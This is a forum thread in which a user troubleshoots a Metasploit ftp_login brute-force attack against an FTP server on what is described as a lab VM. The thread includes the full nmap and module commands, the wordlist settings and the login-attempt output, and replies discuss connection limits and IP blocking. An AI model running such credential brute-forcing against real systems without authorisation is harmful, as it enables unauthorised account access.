Jump to content

Metasploit ftp_login not working well


yyang
 Share

Recommended Posts

Hello,

I am trying to bruteforce one of the VM machine running FTP server using metasploit framework but it does not work for me well for some reason. I mean ftp_login does not try all passowrds in the list. Does anyone know what might be wrong? Thanks.

nmap -p 21 192.168.33.203

Starting Nmap 6.40 ( http://nmap.org ) at 2014-11-20 02:16 EST
Nmap scan report for 192.168.33.203
Host is up (0.11s latency).
PORT STATE SERVICE
21/tcp open ftp
MAC Address: 00:50:56:AF:23:93 (VMware)

msf auxiliary(ftp_login) > set RHOSTS 192.168.33.203
RHOSTS => 192.168.33.203
msf auxiliary(ftp_login) > set USER_FILE /usr/share/wordlists/user.txt
USER_FILE => /usr/share/wordlists/user.txt
msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf auxiliary(ftp_login) > set THREADS 50
THREADS => 50
msf auxiliary(ftp_login) > run
[*] 192.168.33.203:21 - Starting FTP login sweep
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:123456 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:12345 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:123456789 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:password (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:iloveyou (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:princess (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:1234567 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:rockyou (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:12345678 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:abc123 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:nicole (Unable to Connect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:daniel (Unable to Connect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:babygirl (Unable to Connect: ) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Link to comment
Share on other sites

Your FTP server only allows 10 concurrent connections yet you're trying 50. I'm guessing metasploit sees 3 failed connection attempts, assumes the host is down and stops the attack altogether.

Link to comment
Share on other sites

But I changed threads to be 1 and tried again. It does not make much difference. Any other idea? Thanks.

msf auxiliary(ftp_login) > set THREADS 1
THREADS => 1
msf auxiliary(ftp_login) > run
[*] 192.168.33.203:21 - Starting FTP login sweep
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:123456 (Unable to Connect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:12345 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:123456789 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:password (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:iloveyou (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:princess (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:1234567 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:rockyou (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:12345678 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:abc123 (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:nicole (Incorrect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:daniel (Unable to Connect: )
[-] 192.168.33.203:21 FTP - LOGIN FAILED: root:babygirl (Unable to Connect: ) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Link to comment
Share on other sites

Yeah. It smells like your FTP server is smart enough to see the attack going on and to outright block your IP or some such. The FTP logs should give more insight. See if you can implement some sort of delay between attempts.

Link to comment
Share on other sites

Ok. I just tried to set BRUTEFORCE_SPEED to 0, and run it again. 3 more passowrds tried this time but "Unable to connect" again after that. Is there any other options to modify the delay in this module or should I suppose this machine is not vulnerable to brute force attack and give up? Thanks.

Link to comment
Share on other sites

The more sensible approach in the situation as you described it is to post the relevant info from the FTP logs, which probably say you're trying logins in too close succession. The fact that you don't mention the FTP side worries me (you don't have access or you didn't bother to look in spite of our recommendations).

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...